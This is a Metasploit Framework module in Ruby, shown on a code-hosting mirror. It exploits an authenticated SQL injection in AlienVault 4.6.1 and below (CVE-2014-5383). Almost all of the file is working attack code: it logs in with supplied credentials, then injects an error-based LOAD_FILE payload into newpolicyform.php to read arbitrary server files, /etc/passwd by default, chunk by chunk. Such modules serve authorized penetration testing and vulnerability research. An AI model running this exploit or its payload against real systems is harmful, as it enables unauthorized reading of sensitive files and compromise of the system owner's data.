Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb
19670 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Auxiliary
7
include Msf::Exploit::Remote::HttpClient
8
9
def initialize(info = {})
10
super(
11
update_info(
12
info,
13
'Name' => "AlienVault Authenticated SQL Injection Arbitrary File Read",
14
'Description' => %q{
15
AlienVault 4.6.1 and below is susceptible to an authenticated SQL injection attack against
16
newpolicyform.php, using the 'insertinto' parameter. This module exploits the vulnerability
17
to read an arbitrary file from the file system. Any authenticated user is able to exploit
18
this, as administrator privileges are not required.
19
},
20
'License' => MSF_LICENSE,
21
'Author' => [
22
'Chris Hebert <chrisdhebert[at]gmail.com>'
23
],
24
'References' => [
25
['CVE', '2014-5383'],
26
['OSVDB', '106815'],
27
['EDB', '33317'],
28
['URL', 'http://forums.alienvault.com/discussion/2690/security-advisories-v4-6-1-and-lower']
29
],
30
'DefaultOptions' => {
31
'SSL' => true
32
},
33
'Privileged' => false,
34
'DisclosureDate' => '2014-05-09',
35
'Notes' => {
36
'Reliability' => UNKNOWN_RELIABILITY,
37
'Stability' => UNKNOWN_STABILITY,
38
'SideEffects' => UNKNOWN_SIDE_EFFECTS
39
}
40
)
41
)
42
43
register_options([
44
Opt::RPORT(443),
45
OptString.new('FILEPATH', [ true, 'Path to remote file', '/etc/passwd' ]),
46
OptString.new('USERNAME', [ true, 'Single username' ]),
47
OptString.new('PASSWORD', [ true, 'Single password' ]),
48
OptString.new('TARGETURI', [ true, 'Relative URI of installation', '/' ]),
49
OptInt.new('SQLI_TIMEOUT', [ true, 'Specify the maximum time to exploit the sqli (in seconds)', 60])
50
])
51
end
52
53
def run
54
print_status("Get a valid session cookie...")
55
res = send_request_cgi({
56
'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php')
57
})
58
59
unless res && res.code == 200
60
print_error("Server did not respond in an expected way")
61
return
62
end
63
64
cookie = res.get_cookies
65
66
if cookie.blank?
67
print_error("Could not retrieve a cookie")
68
return
69
end
70
71
post = {
72
'embed' => '',
73
'bookmark_string' => '',
74
'user' => datastore['USERNAME'],
75
'passu' => datastore['PASSWORD'],
76
'pass' => Rex::Text.encode_base64(datastore['PASSWORD'])
77
}
78
79
print_status("Login...")
80
81
res = send_request_cgi({
82
'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php'),
83
'method' => 'POST',
84
'vars_post' => post,
85
'cookie' => cookie
86
})
87
88
unless res && res.code == 302
89
print_error("Server did not respond in an expected way")
90
return
91
end
92
93
unless res.headers['Location'] && res.headers['Location'] == normalize_uri(target_uri.path, 'ossim/')
94
print_error("Authentication failed")
95
return
96
end
97
98
cookie = res.get_cookies
99
100
if cookie.blank?
101
print_error("Could not retrieve the authenticated cookie")
102
return
103
end
104
105
i = 0
106
full = ''
107
filename = datastore['FILEPATH'].unpack("H*")[0]
108
left_marker = Rex::Text.rand_text_alpha(6)
109
right_marker = Rex::Text.rand_text_alpha(6)
110
sql_true = Rex::Text.rand_text_alpha(6)
111
112
print_status("Exploiting SQLi...")
113
114
begin
115
::Timeout.timeout(datastore['SQLI_TIMEOUT']) do
116
loop do
117
file = sqli(left_marker, right_marker, sql_true, i, cookie, filename)
118
return if file.nil?
119
break if file.empty?
120
121
str = [file].pack("H*")
122
full << str
123
vprint_status(str)
124
125
i = i + 1
126
end
127
end
128
rescue ::Timeout::Error
129
if full.blank?
130
print_error("Timeout while exploiting sqli, nothing recovered")
131
else
132
print_error("Timeout while exploiting sqli, #{full.length} bytes recovered")
133
end
134
return
135
end
136
137
path = store_loot('alienvault.file', 'text/plain', datastore['RHOST'], full, datastore['FILEPATH'])
138
print_good("File stored at path: " + path)
139
end
140
141
def sqli(left_marker, right_marker, sql_true, i, cookie, filename)
142
pay = "X') AND (SELECT 1170 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},"
143
pay << "(SELECT MID((IFNULL(CAST(HEX(LOAD_FILE(0x#{filename})) AS CHAR),"
144
pay << "0x20)),#{(50 * i) + 1},50)),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS"
145
pay << " GROUP BY x)a) AND ('0x#{sql_true.unpack("H*")[0]}'='0x#{sql_true.unpack("H*")[0]}"
146
147
get = {
148
'insertafter' => pay,
149
'ctx' => 0
150
}
151
152
res = send_request_cgi({
153
'uri' => normalize_uri(target_uri.path, 'ossim', 'policy', 'newpolicyform.php'),
154
'cookie' => cookie,
155
'vars_get' => get
156
})
157
158
if res && res.body && res.body =~ /#{left_marker}(.*)#{right_marker}/
159
return $1
160
else
161
print_error("Server did not respond in an expected way")
162
return nil
163
end
164
end
165
end
166
167